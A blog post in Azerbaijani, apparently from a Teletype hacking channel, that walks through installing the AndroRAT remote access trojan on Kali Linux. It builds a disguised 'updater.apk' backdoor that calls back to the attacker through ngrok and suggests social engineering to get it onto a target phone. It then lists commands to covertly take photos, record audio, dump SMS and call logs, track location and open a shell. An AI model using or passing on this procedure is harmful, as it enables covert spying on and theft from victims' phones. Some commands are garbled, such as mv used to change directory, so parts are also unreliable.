About Teletype
Join
@pikach
Hacking
June 4, 2023

AndroRat istifadə edərək Android smartfonunu sındırmaq.

Mən AndroRAT istifadə edərək smartfon üzərində gizli uzaqdan idarəetməni necə əldə etmək barədə danışıram

SADIG ALIYEV | HACKSPACE AZERBAIJAN

Hamınıza salam, əziz dostlar! Bugünkü məqalədə bir Android smartfonunun fəaliyyətini uzaqdan idarə etmək və izləmək üçün başqa bir yol nəzərdən keçirəcəyik. Pulsuz AndroRAT aləti bu işdə bizə kömək edəcək.

Bundan sonra sizə Kali Linux-da AndroRAT-ı necə quraşdırmaq və istifadə etmək barədə ətraflı məlumat verəcəyəm.

Telefonunuzu uzaqdan idarə etməyin yolları.

Telefonunuzu uzaqdan idarə etməyin bir çox müxtəlif yolu var. Artıq sizə bəzi mobil casuslar haqqında danışdım. Onların zəngin funksionallığı var, lakin hamısı ödənişlidir. Bundan əlavə, onlar vasitəçi kimi işləyirlər, yəni. bütün telefon fəaliyyəti məlumatı sizin tərəfinizdən deyil, mobil casus tərtibatçısının serverində saxlanılır. Onlar yalnız öz veb-saytlarında idarəetmə paneli vasitəsilə alınan məlumatlara rahat girişi təmin edəcəklər.

⚡️Bu gün mən AndroRAT və Kali Linux istifadə edərək telefonunuzu uzaqdan idarə etməyin pulsuz yolunu nəzərdən keçirməyi təklif edirəm.

Telefonunuzu uzaqdan idarə etmək üçün sizə lazımdır:

  • Kali Linux-da AndroRAT quraşdırın.
  • Ngrok-u quraşdırın və konfiqurasiya edin.
  • Faydalı yük yaradın (icra edilə bilən .apk faylı).
  • Hədəf cihazda apk faylını quraşdırın.

AndroRAT ilə uzaqdan telefon idarəsi.

AndroRAT (Remote Access Tool/Trojan. AndroRAT) Android telefonunu uzaqdan idarə etmək üçün nəzərdə tutulmuşdur. Bu müştəri tərəfi üçün Java Android-də hazırlanmış müştəri-server proqramıdır və server tərəfi Python-da yazılmışdır.

Alət Android 4.1 (Jellybean), Android 9 (Oreo), (API 16-dan API 28-ə qədər) cihazlarda işləyəcək. Bu RAT Android 10 və daha yuxarı versiyalarda quraşdırıla bilər, lakin məlumat əldə etmək üçün bəzi əmrlər kifayət qədər sabit işləməyə bilər.

AndroRAT xüsusiyyətləri:

  • Arxa qapı [ Backdoor ] (avtomatik qoşulma).
  • Quraşdırıldıqdan sonra görünməz simvol.
  • Minimum cihaz resurslarından istifadə edir.
  • Smartfonu yenidən işə saldıqdan sonra avtomatik başlanğıc.
  • Hər iki kamera ilə şəkil çəkmək imkanı
  • Mikrofondan audio yazmaq.
  • Zəng və SMS qeydinə baxmaq.
  • Cari yer əldə edilir.
  • Cihazın SİM kartı, IP ünvanı və MAC ünvanı haqqında məlumat.

Kali Linux-da AndroRAT-ı necə quraşdırmaq olar?

AndroRAT işləmək üçün Python3 tələb edir. Python3-ü Kali-də quraşdırmaq üçün əmrdən istifadə edin:

sudo apt install python3 python3-pip

SADIG ALIYEV | KALI LINUX

İndi Java OpenJDK-nı quraşdırmalısınız:

Rəsmi Oracle veb saytına gedin, Oracle hesabı yaradın və hesab məlumatlarınızdan istifadə edərək daxil olun.

SADIG ALIYEV

Qeydiyyatdan keçdikdən və daxil olduqdan sonra OpenJDK yükləmə səhifəsinə keçin. Aşağı diyirləyin və OpenJDK 8 versiyasını tapın.

OpenJDK yükleme sehifəsi link : https://www.oracle.com/java/technologies/downloads/

SADIG ALIYEV

Lisenziya müqaviləsi yoxlanılaraq jdk-8u321-linux-x64.tar.gz linkinə klikləyin.

SADIG ALIYEV

Yükləmə tamamlandıqdan sonra terminalı açın və /usr/lib/jvm ünvanına keçin:

cd /usr/lib/jvm

Sistemdə Java-nın başqa versiyaları quraşdırılmayıbsa, siz /usr/lib-də jvm kataloqu yaratmalı olacaqsınız:

sudo mkdir -p /usr/lib/jvm

OpenJDK arxivini çıxarın:

sudo tar -xvzf ~/Downloads/jdk-8u321-linux-x64.tar.gz

SADIG ALIYEV | KALI LINUX

Faylları çıxardıqdan sonra jdk1.8.0_321 qovluğuna dəyişin:

cd jdk1.8.0_321

İndi mətn redaktorundan istifadə edərək Java mühiti dəyişənlərini dəyişdirməlisiniz (mənim kalidə Nano mətn redaktoru istifadə olunur):

sudo nano /etc/environment

SADIG ALIYEV

Yuxarıdakı ekran görüntüsündə bəzi yolların artıq təyin olunduğunu görə bilərsiniz. : simvolundan istifadə edərək başqalarını əlavə edin:

/usr/lib/jvm/jdk1.8.0_321/bin:/usr/lib/jvm/jdk1.8.0_321/db/bin:/usr/lib/jvm/jdk1.8.0_321/jre/bin

SADIG ALIYEV

"CTRL + X" klaviatura qısa yolundan, sonra "Y" və "Enter" düymələrindən istifadə edərək dəyişiklikləri qeyd edin.

Alternativ olaraq OpenJDK 8 quraşdırın:

sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_321/bin/java" 0

Java kompilyatorunu quraşdırın:

sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_321/bin/javac" 0

İndi Java OpenJDK 8-i quraşdıra bilərsiniz:

sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_321/bin/java

Java kompilyatoru üçün əmrdən istifadə edin:

sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_321/bin/javac

Bu əmrlərin çıxışı aşağıdakı ekran görüntüsündə göstərilir:

SADIG ALIYEV

Java versiyasını seçin (bunu istənilən kataloqdan edə bilərsiniz):

sudo update-alternatives --config java

SADIG ALIYEV

Yuxarıdakı ekran görüntüsündə Java 8 versiyasının 2 nömrəli, Java 11 versiyasının isə 0 nömrəli olduğunu görəcəksiniz.

Versiyalar arasında keçid etmək üçün müvafiq nömrəni seçin. Mənim kalidə 2-dir:

SADIG ALIYEV
Əla, indi Java 8 istifadə edirik, davam edək!

Növbəti addım AndroRAT-ı Kali-də klonlaşdırmaq (quraşdırmaq) olacaq:

git clone https://github.com/karma9874/AndroRAT

SADIG ALIYEV

mv əmrindən istifadə edərək AndroRAT qovluğuna keçin:

mv AndroRAT

AndroRAT asılılıqlarını quraşdırın:

pip3 install -r requirements.txt

SADIG ALIYEV

Bundan sonra ngrok quraşdırmalı və ngrok autentifikasiya nişanını təyin etməlisiniz.

APK faylı yaratmaq üçün əmri yerinə yetirməlisiniz:

python3 androRAT.py --build --ngrok -p 8888 -o ~/Desktop/updater.apk

Komandada istifadə olunan --build arqumenti androRAT.py python skriptindən istifadə edir və faydalı yükü (.apk faylı) qurur. --ngrok arqumenti ngrok vasitəsilə uzaqdan qoşulmaq üçün istifadə olunur.

Yerli şəbəkədə ngrok-u atlaya və əmri -i seçimi ilə işlədə bilərsiniz. Bundan sonra dinləyici əks əlaqəni gözləyən işə salınacaq.

Proqram simvolunu seçmək üçün --icon arqumentindən istifadə edə bilərsiniz. Mənim vəziyyətimdə smartfonuma gizli uzaqdan giriş əldə etmək istəyirəm, ona görə də bu parametri atlayıram.

-o seçimi .apk faylının portunu və yerini seçmək üçün məsuliyyət daşıyır.

SADIG ALIYEV

Yuxarıdakı ekran görüntüsündə AndroRAT-ın .apk faylını yaratdığını və imzaladığını görə bilərik. Fayl yaradıldıqdan sonra əlaqəni gözləyən dinləyici işə salınacaq:

SADIG ALIYEV

İndi siz apk faylını smartfonunuza göndərə bilərsiniz. Əgər cihaza fiziki girişiniz yoxdursa, o zaman sosial mühəndislik üsulları tətbiq oluna bilər.

Kali Linux-da AndroRAT-dan necə istifadə etmək olar?

Məsələn, AndroRAT-ı şəxsi telefonumda quraşdıraq. Faylı hədəf cihaza quraşdırdıqdan sonra Kali terminalında aşağıdakı mesajı görəcəksiniz:

SADIG ALIYEV

Əlaqə quruldu. İndi proqramla qarşılıqlı əlaqə yaratmaq üçün əmrlərdən istifadə edəcəyik:

  • deviceInfo - cihaz haqqında əsas məlumat.
  • camList - kamera identifikatoru.
  • takepic [kamera id] - kameradan şəkil çəkmək.
  • startVideo [kamera ID] — video qeydi.
  • stopVideo - video qeydini dayandırın və video faylı açın.
  • startAudio - səs yazısı.
  • stopAudio - səs yazısını dayandırın.
  • getSMS [inbox|göndərildi] - gələn / göndərilən SMS.
  • getCallLogs - zəng tarixçəsi.
  • shell - start sh shell.
  • vibrasiya [sayı_dəfə] - vibrasiya.
  • getLocation - cihazın yeri.
  • getIP — IP cihazları.
  • getSimDetails - bütün SİM kartlar haqqında məlumat.
  • clear - ekranı təmizləyin.
  • getClipData - buferdən məlumat.
  • getMACAddress — cihazların mac ünvanı.
  • Exit - çıxmaq.

Məsələn, bütün SMS-ləri əldə etmək üçün getSMS əmrini işlədin:

SADIG ALIYEV

Yuxarıdakı ekran görüntüsündə siz bütün SMS-lərin necə qəbul edildiyini və "Dumps" kataloqunda .txt faylında saxlandığını görə bilərsiniz.

Eynilə, əgər kameradan şəkil çəkmək istəyiriksə, camList əmrini işlətməliyik. Sonra telefonun bütün kameralarının siyahısı görünəcək. Daha sonra əmrlə şəkil çəkə bilərik

takepic [kamera nömrəsi]

SADIG ALIYEV

Biz həmçinin terminal cihazına və bir çox başqa maraqlı şeylərə daxil ola bilərik. Çalışın!

İnşAllah bu qədər əziyyətimə dəyər. Məqaləni bəyəndinizsə, reaksiya atmağı unutmayın. ❤️‍🔥🤪

🥷🏻 SADIG From Hack Space

@pikach
June 4, 2023, 22:05
1 reaction
0 views